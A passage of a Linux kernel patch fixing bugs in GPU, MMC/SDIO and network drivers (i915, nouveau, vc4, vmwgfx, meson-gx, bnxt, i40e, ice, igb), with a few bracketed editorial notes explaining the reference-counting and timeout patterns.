+ 	/* Wa_1407352427:icl,ehl */
+ 	wa_write_or(wal, UNSLICE_UNIT_LEVEL_CLKGATE2,
+ 		    PSDUNIT_CLKGATE_DIS);
+@@ -2368,13 +2375,6 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ 		wa_masked_en(wal, GEN9_CSFE_CHICKEN1_RCS,
+ 			     GEN11_ENABLE_32_PLANE_MODE);
+ 
+-		/*
+-		 * Wa_1408615072:icl,ehl  (vsunit)
+-		 * Wa_1407596294:icl,ehl  (hsunit)
+-		 */
+-		wa_write_or(wal, UNSLICE_UNIT_LEVEL_CLKGATE,
+-			    VSUNIT_CLKGATE_DIS | HSUNIT_CLKGATE_DIS);
+-
+ 		/*
+ 		 * Wa_1408767742:icl[a2..forever],ehl[all]
+ 		 * Wa_1605460711:icl[a0..c0]
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c
+index 634f64f88fc8b..81a1ad2c88a7e 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c
+@@ -65,10 +65,33 @@ tu102_devinit_pll_set(struct nvkm_devinit *init, u32 type, u32 freq)
+ 	return ret;
+ }
+ 
++static int
++tu102_devinit_wait(struct nvkm_device *device)
++{
++	unsigned timeout = 50 + 2000;
++
++	do {
++		if (nvkm_rd32(device, 0x118128) & 0x00000001) {
++			if ((nvkm_rd32(device, 0x118234) & 0x000000ff) == 0xff)
++				return 0;
++		}
++
++		usleep_range(1000, 2000);
++	} while (timeout--);
++
++	return -ETIMEDOUT;
++}
++
+ int
+ tu102_devinit_post(struct nvkm_devinit *base, bool post)
+ {
+ 	struct nv50_devinit *init = nv50_devinit(base);
++	int ret;
++
++	ret = tu102_devinit_wait(init->base.subdev.device);
++	if (ret)
++		return ret;
++
+ 	gm200_devinit_preos(init, post);
+ 	return 0;
+ }
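[Editor's sketch] tu102_devinit_wait() above is a standard poll-with-timeout loop: read a status register roughly once per millisecond and give up after about two seconds. A hedged, generic sketch of the same shape (the register offset and ready mask here are placeholders, not values from the patch):

static int wait_for_ready(struct nvkm_device *device, u32 reg, u32 mask)
{
	unsigned int tries = 2050;	/* ~2s at 1ms per iteration */

	do {
		if ((nvkm_rd32(device, reg) & mask) == mask)
			return 0;
		usleep_range(1000, 2000);
	} while (--tries);

	return -ETIMEDOUT;
}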
+diff --git a/drivers/gpu/drm/vc4/vc4_crtc.c b/drivers/gpu/drm/vc4/vc4_crtc.c
+index 0108613e79d53..7258975331ca7 100644
+--- a/drivers/gpu/drm/vc4/vc4_crtc.c
++++ b/drivers/gpu/drm/vc4/vc4_crtc.c
+@@ -711,7 +711,7 @@ static int vc4_crtc_atomic_check(struct drm_crtc *crtc,
+ 		struct vc4_encoder *vc4_encoder = to_vc4_encoder(encoder);
+ 
+ 		if (vc4_encoder->type == VC4_ENCODER_TYPE_HDMI0) {
+-			vc4_state->hvs_load = max(mode->clock * mode->hdisplay / mode->htotal + 1000,
++			vc4_state->hvs_load = max(mode->clock * mode->hdisplay / mode->htotal + 8000,
+ 						  mode->clock * 9 / 10) * 1000;
+ 		} else {
+ 			vc4_state->hvs_load = mode->clock * 1000;
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index 8b92a45a3c898..bd5acc4a86876 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -340,7 +340,7 @@ static int vc4_plane_setup_clipping_and_scaling(struct drm_plane_state *state)
+ {
+ 	struct vc4_plane_state *vc4_state = to_vc4_plane_state(state);
+ 	struct drm_framebuffer *fb = state->fb;
+-	struct drm_gem_dma_object *bo = drm_fb_dma_get_gem_obj(fb, 0);
++	struct drm_gem_dma_object *bo;
+ 	int num_planes = fb->format->num_planes;
+ 	struct drm_crtc_state *crtc_state;
+ 	u32 h_subsample = fb->format->hsub;
+@@ -359,8 +359,10 @@ static int vc4_plane_setup_clipping_and_scaling(struct drm_plane_state *state)
+ 	if (ret)
+ 		return ret;
+ 
+-	for (i = 0; i < num_planes; i++)
++	for (i = 0; i < num_planes; i++) {
++		bo = drm_fb_dma_get_gem_obj(fb, i);
+ 		vc4_state->offsets[i] = bo->dma_addr + fb->offsets[i];
++	}
+ 
+ 	/*
+ 	 * We don't support subpixel source positioning for scaling,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+index 973a0a52462e9..ae01d22b8f840 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+@@ -462,6 +462,9 @@ int vmw_bo_create(struct vmw_private *vmw,
+ 		return -ENOMEM;
+ 	}
+ 
++	/*
++	 * vmw_bo_init will delete the *p_bo object if it fails
++	 */
+ 	ret = vmw_bo_init(vmw, *p_bo, size,
+ 			  placement, interruptible, pin,
+ 			  bo_free);
+@@ -470,7 +473,6 @@ int vmw_bo_create(struct vmw_private *vmw,
+ 
+ 	return ret;
+ out_error:
+-	kfree(*p_bo);
+ 	*p_bo = NULL;
+ 	return ret;
+ }
+@@ -596,6 +598,7 @@ static int vmw_user_bo_synccpu_release(struct drm_file *filp,
+ 		ttm_bo_put(&vmw_bo->base);
+ 	}
+ 
++	drm_gem_object_put(&vmw_bo->base.base);
+ 	return ret;
+ }
+ 
+@@ -636,6 +639,7 @@ int vmw_user_bo_synccpu_ioctl(struct drm_device *dev, void *data,
+ 
+ 		ret = vmw_user_bo_synccpu_grab(vbo, arg->flags);
+ 		vmw_bo_unreference(&vbo);
++		drm_gem_object_put(&vbo->base.base);
+ 		if (unlikely(ret != 0)) {
+ 			if (ret == -ERESTARTSYS || ret == -EBUSY)
+ 				return -EBUSY;
+@@ -693,7 +697,7 @@ int vmw_bo_unref_ioctl(struct drm_device *dev, void *data,
+  * struct vmw_buffer_object should be placed.
+  * Return: Zero on success, Negative error code on error.
+  *
+- * The vmw buffer object pointer will be refcounted.
++ * The vmw buffer object pointer will be refcounted (both ttm and gem)
+  */
+ int vmw_user_bo_lookup(struct drm_file *filp,
+ 		       uint32_t handle,
+@@ -710,7 +714,6 @@ int vmw_user_bo_lookup(struct drm_file *filp,
+ 
+ 	*out = gem_to_vmw_bo(gobj);
+ 	ttm_bo_get(&(*out)->base);
+-	drm_gem_object_put(gobj);
+ 
+ 	return 0;
+ }
+@@ -777,7 +780,8 @@ int vmw_dumb_create(struct drm_file *file_priv,
+ 	ret = vmw_gem_object_create_with_handle(dev_priv, file_priv,
+ 						args->size, &args->handle,
+ 						&vbo);
+-
++	/* drop reference from allocate - handle holds it now */
++	drm_gem_object_put(&vbo->base.base);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 70cfed4fdba04..1c88b74d68cf0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1160,6 +1160,7 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, true, false);
+ 	ttm_bo_put(&vmw_bo->base);
++	drm_gem_object_put(&vmw_bo->base.base);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+@@ -1214,6 +1215,7 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, false, false);
+ 	ttm_bo_put(&vmw_bo->base);
++	drm_gem_object_put(&vmw_bo->base.base);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+index ce609e7d758f8..4d2c28e39f4e0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+@@ -146,14 +146,12 @@ int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ 				    &vmw_sys_placement :
+ 				    &vmw_vram_sys_placement,
+ 			    true, false, &vmw_gem_destroy, p_vbo);
+-
+-	(*p_vbo)->base.base.funcs = &vmw_gem_object_funcs;
+ 	if (ret != 0)
+ 		goto out_no_bo;
+ 
++	(*p_vbo)->base.base.funcs = &vmw_gem_object_funcs;
++
+ 	ret = drm_gem_handle_create(filp, &(*p_vbo)->base.base, handle);
+-	/* drop reference from allocate - handle holds it now */
+-	drm_gem_object_put(&(*p_vbo)->base.base);
+ out_no_bo:
+ 	return ret;
+ }
+@@ -180,6 +178,8 @@ int vmw_gem_object_create_ioctl(struct drm_device *dev, void *data,
+ 	rep->map_handle = drm_vma_node_offset_addr(&vbo->base.base.vma_node);
+ 	rep->cur_gmr_id = handle;
+ 	rep->cur_gmr_offset = 0;
++	/* drop reference from allocate - handle holds it now */
++	drm_gem_object_put(&vbo->base.base);
+ out_no_bo:
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 7a2f262414ad4..13721bcf047c0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -1669,8 +1669,10 @@ static struct drm_framebuffer *vmw_kms_fb_create(struct drm_device *dev,
+ 
+ err_out:
+ 	/* vmw_user_lookup_handle takes one ref so does new_fb */
+-	if (bo)
++	if (bo) {
+ 		vmw_bo_unreference(&bo);
++		drm_gem_object_put(&bo->base.base);
++	}
+ 	if (surface)
+ 		vmw_surface_unreference(&surface);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+index e9f5c89b4ca69..b5b311f2a91a4 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+@@ -458,6 +458,7 @@ int vmw_overlay_ioctl(struct drm_device *dev, void *data,
+ 	ret = vmw_overlay_update_stream(dev_priv, buf, arg, true);
+ 
+ 	vmw_bo_unreference(&buf);
++	drm_gem_object_put(&buf->base.base);
+ 
+ out_unlock:
+ 	mutex_unlock(&overlay->mutex);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+index 108a496b5d189..51e83dfa1cace 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+@@ -807,6 +807,7 @@ static int vmw_shader_define(struct drm_device *dev, struct drm_file *file_priv,
+ 				    num_output_sig, tfile, shader_handle);
+ out_bad_arg:
+ 	vmw_bo_unreference(&buffer);
++	drm_gem_object_put(&buffer->base.base);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+index ace7ca150b036..591c301e6cf21 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+@@ -683,7 +683,7 @@ static void vmw_user_surface_base_release(struct ttm_base_object **p_base)
+ 	    container_of(base, struct vmw_user_surface, prime.base);
+ 	struct vmw_resource *res = &user_srf->srf.res;
+ 
+-	if (base->shareable && res && res->backup)
++	if (res && res->backup)
+ 		drm_gem_object_put(&res->backup->base.base);
+ 
+ 	*p_base = NULL;
+@@ -860,7 +860,11 @@ int vmw_surface_define_ioctl(struct drm_device *dev, void *data,
+ 			goto out_unlock;
+ 		}
+ 		vmw_bo_reference(res->backup);
+-		drm_gem_object_get(&res->backup->base.base);
++		/*
++		 * We don't expose the handle to the userspace and surface
++		 * already holds a gem reference
++		 */
++		drm_gem_handle_delete(file_priv, backup_handle);
+ 	}
+ 
+ 	tmp = vmw_resource_reference(&srf->res);
+@@ -1564,8 +1568,6 @@ vmw_gb_surface_define_internal(struct drm_device *dev,
+ 			drm_vma_node_offset_addr(&res->backup->base.base.vma_node);
+ 		rep->buffer_size = res->backup->base.base.size;
+ 		rep->buffer_handle = backup_handle;
+-		if (user_srf->prime.base.shareable)
+-			drm_gem_object_get(&res->backup->base.base);
+ 	} else {
+ 		rep->buffer_map_handle = 0;
+ 		rep->buffer_size = 0;
+diff --git a/drivers/mmc/core/sdio_bus.c b/drivers/mmc/core/sdio_bus.c
+index babf21a0adeb6..f191a2a76f3bb 100644
+--- a/drivers/mmc/core/sdio_bus.c
++++ b/drivers/mmc/core/sdio_bus.c
+@@ -294,6 +294,12 @@ static void sdio_release_func(struct device *dev)
+ 	if (!(func->card->quirks & MMC_QUIRK_NONSTD_SDIO))
+ 		sdio_free_func_cis(func);
+ 
++	/*
++	 * We have now removed the link to the tuples in the
++	 * card structure, so remove the reference.
++	 */
++	put_device(&func->card->dev);
++
+ 	kfree(func->info);
+ 	kfree(func->tmpbuf);
+ 	kfree(func);
+@@ -324,6 +330,12 @@ struct sdio_func *sdio_alloc_func(struct mmc_card *card)
+ 
+ 	device_initialize(&func->dev);
+ 
++	/*
++	 * We may link to tuples in the card structure,
++	 * so we need to make sure we have a reference to it.
++	 */
++	get_device(&func->card->dev);
++
+ 	func->dev.parent = &card->dev;
+ 	func->dev.bus = &sdio_bus_type;
+ 	func->dev.release = sdio_release_func;
+@@ -377,10 +389,9 @@ int sdio_add_func(struct sdio_func *func)
+  */
+ void sdio_remove_func(struct sdio_func *func)
+ {
+-	if (!sdio_func_present(func))
+-		return;
++	if (sdio_func_present(func))
++		device_del(&func->dev);
+ 
+-	device_del(&func->dev);
+ 	of_node_put(func->dev.of_node);
+ 	put_device(&func->dev);
+ }
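[Editor's sketch] The hunks above move the reference pairing to where the link is actually created: get_device() on the parent in the constructor, put_device() in the release callback, so the pair is balanced on every path, including cards that never parse a function CIS (the matching removal from the CIS code follows below). A minimal sketch of the pattern, with an illustrative struct:

struct child {
	struct device dev;
	struct device *parent;
};

static void child_release(struct device *dev)
{
	struct child *c = container_of(dev, struct child, dev);

	put_device(c->parent);		/* balances get_device() in alloc */
	kfree(c);
}

static struct child *child_alloc(struct device *parent)
{
	struct child *c = kzalloc(sizeof(*c), GFP_KERNEL);

	if (!c)
		return NULL;
	device_initialize(&c->dev);
	c->parent = get_device(parent);	/* pin the parent while linked */
	c->dev.release = child_release;
	return c;
}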
+diff --git a/drivers/mmc/core/sdio_cis.c b/drivers/mmc/core/sdio_cis.c
+index a705ba6eff5bf..afaa6cab1adc3 100644
+--- a/drivers/mmc/core/sdio_cis.c
++++ b/drivers/mmc/core/sdio_cis.c
+@@ -403,12 +403,6 @@ int sdio_read_func_cis(struct sdio_func *func)
+ 	if (ret)
+ 		return ret;
+ 
+-	/*
+-	 * Since we've linked to tuples in the card structure,
+-	 * we must make sure we have a reference to it.
+-	 */
+-	get_device(&func->card->dev);
+-
+ 	/*
+ 	 * Vendor/device id is optional for function CIS, so
+ 	 * copy it from the card structure as needed.
+@@ -434,11 +428,5 @@ void sdio_free_func_cis(struct sdio_func *func)
+ 	}
+ 
+ 	func->tuples = NULL;
+-
+-	/*
+-	 * We have now removed the link to the tuples in the
+-	 * card structure, so remove the reference.
+-	 */
+-	put_device(&func->card->dev);
+ }
+ 
+diff --git a/drivers/mmc/host/jz4740_mmc.c b/drivers/mmc/host/jz4740_mmc.c
+index dc2db9c185ea0..eda1e2ddcaca8 100644
+--- a/drivers/mmc/host/jz4740_mmc.c
++++ b/drivers/mmc/host/jz4740_mmc.c
+@@ -1053,6 +1053,16 @@ static int jz4740_mmc_probe(struct platform_device* pdev)
+ 	mmc->ops = &jz4740_mmc_ops;
+ 	if (!mmc->f_max)
+ 		mmc->f_max = JZ_MMC_CLK_RATE;
++
++	/*
++	 * There seems to be a problem with this driver on the JZ4760 and
++	 * JZ4760B SoCs. There, when using the maximum rate supported (50 MHz),
++	 * the communication fails with many SD cards.
++	 * Until this bug is sorted out, limit the maximum rate to 24 MHz.
++	 */
++	if (host->version == JZ_MMC_JZ4760 && mmc->f_max > JZ_MMC_CLK_RATE)
++		mmc->f_max = JZ_MMC_CLK_RATE;
++
+ 	mmc->f_min = mmc->f_max / 128;
+ 	mmc->ocr_avail = MMC_VDD_32_33 | MMC_VDD_33_34;
+ 
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index 6e5ea0213b477..5c94ad4661ce3 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -435,7 +435,8 @@ static int meson_mmc_clk_init(struct meson_host *host)
+ 	clk_reg |= FIELD_PREP(CLK_CORE_PHASE_MASK, CLK_PHASE_180);
+ 	clk_reg |= FIELD_PREP(CLK_TX_PHASE_MASK, CLK_PHASE_0);
+ 	clk_reg |= FIELD_PREP(CLK_RX_PHASE_MASK, CLK_PHASE_0);
+-	clk_reg |= CLK_IRQ_SDIO_SLEEP(host);
++	if (host->mmc->caps & MMC_CAP_SDIO_IRQ)
++		clk_reg |= CLK_IRQ_SDIO_SLEEP(host);
+ 	writel(clk_reg, host->regs + SD_EMMC_CLOCK);
+ 
+ 	/* get the mux parents */
+@@ -948,16 +949,18 @@ static irqreturn_t meson_mmc_irq(int irq, void *dev_id)
+ {
+ 	struct meson_host *host = dev_id;
+ 	struct mmc_command *cmd;
+-	u32 status, raw_status;
++	u32 status, raw_status, irq_mask = IRQ_EN_MASK;
+ 	irqreturn_t ret = IRQ_NONE;
+ 
++	if (host->mmc->caps & MMC_CAP_SDIO_IRQ)
++		irq_mask |= IRQ_SDIO;
+ 	raw_status = readl(host->regs + SD_EMMC_STATUS);
+-	status = raw_status & (IRQ_EN_MASK | IRQ_SDIO);
++	status = raw_status & irq_mask;
+ 
+ 	if (!status) {
+ 		dev_dbg(host->dev,
+-			"Unexpected IRQ! irq_en 0x%08lx - status 0x%08x\n",
+-			 IRQ_EN_MASK | IRQ_SDIO, raw_status);
++			"Unexpected IRQ! irq_en 0x%08x - status 0x%08x\n",
++			 irq_mask, raw_status);
+ 		return IRQ_NONE;
+ 	}
+ 
+@@ -1204,6 +1207,11 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 		goto free_host;
+ 	}
+ 
++	mmc->caps |= MMC_CAP_CMD23;
++
++	if (mmc->caps & MMC_CAP_SDIO_IRQ)
++		mmc->caps2 |= MMC_CAP2_SDIO_IRQ_NOTHREAD;
++
+ 	host->data = (struct meson_mmc_data *)
+ 		of_device_get_match_data(&pdev->dev);
+ 	if (!host->data) {
+@@ -1277,11 +1285,6 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&host->lock);
+ 
+-	mmc->caps |= MMC_CAP_CMD23;
+-
+-	if (mmc->caps & MMC_CAP_SDIO_IRQ)
+-		mmc->caps2 |= MMC_CAP2_SDIO_IRQ_NOTHREAD;
+-
+ 	if (host->dram_access_quirk) {
+ 		/* Limit segments to 1 due to low available sram memory */
+ 		mmc->max_segs = 1;
+diff --git a/drivers/mmc/host/mmc_spi.c b/drivers/mmc/host/mmc_spi.c
+index 106dd204b1a7f..cc333ad67cac8 100644
+--- a/drivers/mmc/host/mmc_spi.c
++++ b/drivers/mmc/host/mmc_spi.c
+@@ -1437,7 +1437,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 
+ 	status = mmc_add_host(mmc);
+ 	if (status != 0)
+-		goto fail_add_host;
++		goto fail_glue_init;
+ 
+ 	/*
+ 	 * Index 0 is card detect
+@@ -1445,7 +1445,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 	 */
+ 	status = mmc_gpiod_request_cd(mmc, NULL, 0, false, 1000);
+ 	if (status == -EPROBE_DEFER)
+-		goto fail_add_host;
++		goto fail_gpiod_request;
+ 	if (!status) {
+ 		/*
+ 		 * The platform has a CD GPIO signal that may support
+@@ -1460,7 +1460,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 	/* Index 1 is write protect/read only */
+ 	status = mmc_gpiod_request_ro(mmc, NULL, 1, 0);
+ 	if (status == -EPROBE_DEFER)
+-		goto fail_add_host;
++		goto fail_gpiod_request;
+ 	if (!status)
+ 		has_ro = true;
+ 
+@@ -1474,7 +1474,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 				? ", cd polling" : "");
+ 	return 0;
+ 
+-fail_add_host:
++fail_gpiod_request:
+ 	mmc_remove_host(mmc);
+ fail_glue_init:
+ 	mmc_spi_dma_free(host);
+diff --git a/drivers/net/ethernet/broadcom/bgmac-bcma.c b/drivers/net/ethernet/broadcom/bgmac-bcma.c
+index 02bd3cf9a260e..6e4f36aaf5db6 100644
+--- a/drivers/net/ethernet/broadcom/bgmac-bcma.c
++++ b/drivers/net/ethernet/broadcom/bgmac-bcma.c
+@@ -240,12 +240,12 @@ static int bgmac_probe(struct bcma_device *core)
+ 		bgmac->feature_flags |= BGMAC_FEAT_CLKCTLST;
+ 		bgmac->feature_flags |= BGMAC_FEAT_FLW_CTRL1;
+ 		bgmac->feature_flags |= BGMAC_FEAT_SW_TYPE_PHY;
+-		if (ci->pkg == BCMA_PKG_ID_BCM47188 ||
+-		    ci->pkg == BCMA_PKG_ID_BCM47186) {
++		if ((ci->id == BCMA_CHIP_ID_BCM5357 && ci->pkg == BCMA_PKG_ID_BCM47186) ||
++		    (ci->id == BCMA_CHIP_ID_BCM53572 && ci->pkg == BCMA_PKG_ID_BCM47188)) {
+ 			bgmac->feature_flags |= BGMAC_FEAT_SW_TYPE_RGMII;
+ 			bgmac->feature_flags |= BGMAC_FEAT_IOST_ATTACHED;
+ 		}
+-		if (ci->pkg == BCMA_PKG_ID_BCM5358)
++		if (ci->id == BCMA_CHIP_ID_BCM5357 && ci->pkg == BCMA_PKG_ID_BCM5358)
+ 			bgmac->feature_flags |= BGMAC_FEAT_SW_TYPE_EPHYRMII;
+ 		break;
+ 	case BCMA_CHIP_ID_BCM53573:
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index edca16b5f9e34..cecda545372f9 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -9239,10 +9239,14 @@ int bnxt_reserve_rings(struct bnxt *bp, bool irq_re_init)
+ 		netdev_err(bp->dev, "ring reservation/IRQ init failure rc: %d\n", rc);
+ 		return rc;
+ 	}
+-	if (tcs && (bp->tx_nr_rings_per_tc * tcs != bp->tx_nr_rings)) {
++	if (tcs && (bp->tx_nr_rings_per_tc * tcs !=
++		    bp->tx_nr_rings - bp->tx_nr_rings_xdp)) {
+ 		netdev_err(bp->dev, "tx ring reservation failure\n");
+ 		netdev_reset_tc(bp->dev);
+-		bp->tx_nr_rings_per_tc = bp->tx_nr_rings;
++		if (bp->tx_nr_rings_xdp)
++			bp->tx_nr_rings_per_tc = bp->tx_nr_rings_xdp;
++		else
++			bp->tx_nr_rings_per_tc = bp->tx_nr_rings;
+ 		return -ENOMEM;
+ 	}
+ 	return 0;
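[Editor's note] A worked example of the corrected check, with hypothetical numbers: tx_nr_rings = 8, tx_nr_rings_xdp = 2, tcs = 3 and tx_nr_rings_per_tc = 2 gives 2 * 3 = 6, which equals 8 - 2, so the reservation succeeds; the old comparison against bp->tx_nr_rings (6 != 8) failed spuriously whenever XDP rings were part of the total.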
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index e6e349f0c9457..d30bc38725e97 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -2921,7 +2921,7 @@ static int i40e_change_mtu(struct net_device *netdev, int new_mtu)
+ 	struct i40e_pf *pf = vsi->back;
+ 
+ 	if (i40e_enabled_xdp_vsi(vsi)) {
+-		int frame_size = new_mtu + ETH_HLEN + ETH_FCS_LEN + VLAN_HLEN;
++		int frame_size = new_mtu + I40E_PACKET_HDR_PAD;
+ 
+ 		if (frame_size > i40e_max_xdp_frame_size(vsi))
+ 			return -EINVAL;
+@@ -13140,6 +13140,8 @@ static int i40e_ndo_bridge_setlink(struct net_device *dev,
+ 	}
+ 
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
++	if (!br_spec)
++		return -EINVAL;
+ 
+ 	nla_for_each_nested(attr, br_spec, rem) {
+ 		__u16 mode;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 333582dabba16..72f97bb50b09c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -270,6 +270,8 @@ static int ice_set_promisc(struct ice_vsi *vsi, u8 promisc_m)
+ 	if (status && status != -EEXIST)
+ 		return status;
+ 
++	netdev_dbg(vsi->netdev, "set promisc filter bits for VSI %i: 0x%x\n",
++		   vsi->vsi_num, promisc_m);
+ 	return 0;
+ }
+ 
+@@ -295,6 +297,8 @@ static int ice_clear_promisc(struct ice_vsi *vsi, u8 promisc_m)
+ 						    promisc_m, 0);
+ 	}
+ 
++	netdev_dbg(vsi->netdev, "clear promisc filter bits for VSI %i: 0x%x\n",
++		   vsi->vsi_num, promisc_m);
+ 	return status;
+ }
+ 
+@@ -423,6 +427,16 @@ static int ice_vsi_sync_fltr(struct ice_vsi *vsi)
+ 				}
+ 				err = 0;
+ 				vlan_ops->dis_rx_filtering(vsi);
++
++				/* promiscuous mode implies allmulticast so
++				 * that VSIs that are in promiscuous mode are
++				 * subscribed to multicast packets coming to
++				 * the port
++				 */
++				err = ice_set_promisc(vsi,
++						      ICE_MCAST_PROMISC_BITS);
++				if (err)
++					goto out_promisc;
+ 			}
+ 		} else {
+ 			/* Clear Rx filter to remove traffic from wire */
+@@ -439,6 +453,18 @@ static int ice_vsi_sync_fltr(struct ice_vsi *vsi)
+ 				    NETIF_F_HW_VLAN_CTAG_FILTER)
+ 					vlan_ops->ena_rx_filtering(vsi);
+ 			}
++
++			/* disable allmulti here, but only if allmulti is not
++			 * still enabled for the netdev
++			 */
++			if (!(vsi->current_netdev_flags & IFF_ALLMULTI)) {
++				err = ice_clear_promisc(vsi,
++							ICE_MCAST_PROMISC_BITS);
++				if (err) {
++					netdev_err(netdev, "Error %d clearing multicast promiscuous on VSI %i\n",
++						   err, vsi->vsi_num);
++				}
++			}
+ 		}
+ 	}
+ 	goto exit;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 79fa65d1cf201..65468cdc25870 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -789,6 +789,7 @@ static void ice_clean_xdp_irq_zc(struct ice_tx_ring *xdp_ring)
+ 	struct ice_tx_desc *tx_desc;
+ 	u16 cnt = xdp_ring->count;
+ 	struct ice_tx_buf *tx_buf;
++	u16 completed_frames = 0;
+ 	u16 xsk_frames = 0;
+ 	u16 last_rs;
+ 	int i;
+@@ -798,19 +799,21 @@ static void ice_clean_xdp_irq_zc(struct ice_tx_ring *xdp_ring)
+ 	if ((tx_desc->cmd_type_offset_bsz &
+ 	    cpu_to_le64(ICE_TX_DESC_DTYPE_DESC_DONE))) {
+ 		if (last_rs >= ntc)
+-			xsk_frames = last_rs - ntc + 1;
++			completed_frames = last_rs - ntc + 1;
+ 		else
+-			xsk_frames = last_rs + cnt - ntc + 1;
++			completed_frames = last_rs + cnt - ntc + 1;
+ 	}
+ 
+-	if (!xsk_frames)
++	if (!completed_frames)
+ 		return;
+ 
+-	if (likely(!xdp_ring->xdp_tx_active))
++	if (likely(!xdp_ring->xdp_tx_active)) {
++		xsk_frames = completed_frames;
+ 		goto skip;
++	}
+ 
+ 	ntc = xdp_ring->next_to_clean;
+-	for (i = 0; i < xsk_frames; i++) {
++	for (i = 0; i < completed_frames; i++) {
+ 		tx_buf = &xdp_ring->tx_buf[ntc];
+ 
+ 		if (tx_buf->raw_buf) {
+@@ -826,7 +829,7 @@ static void ice_clean_xdp_irq_zc(struct ice_tx_ring *xdp_ring)
+ 	}
+ skip:
+ 	tx_desc->cmd_type_offset_bsz = 0;
+-	xdp_ring->next_to_clean += xsk_frames;
++	xdp_ring->next_to_clean += completed_frames;
+ 	if (xdp_ring->next_to_clean >= cnt)
+ 		xdp_ring->next_to_clean -= cnt;
+ 	if (xsk_frames)
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 24a6ae19ad8ed..bf4317e47f948 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -2256,6 +2256,30 @@ static void igb_enable_mas(struct igb_adapter *adapter)
+ 	}
+ }
+ 
++#ifdef CONFIG_IGB_HWMON
++/**
++ *  igb_set_i2c_bb - Init I2C interface
++ *  @hw: pointer to hardware structure
++ **/
++static void igb_set_i2c_bb(struct e1000_hw *hw)
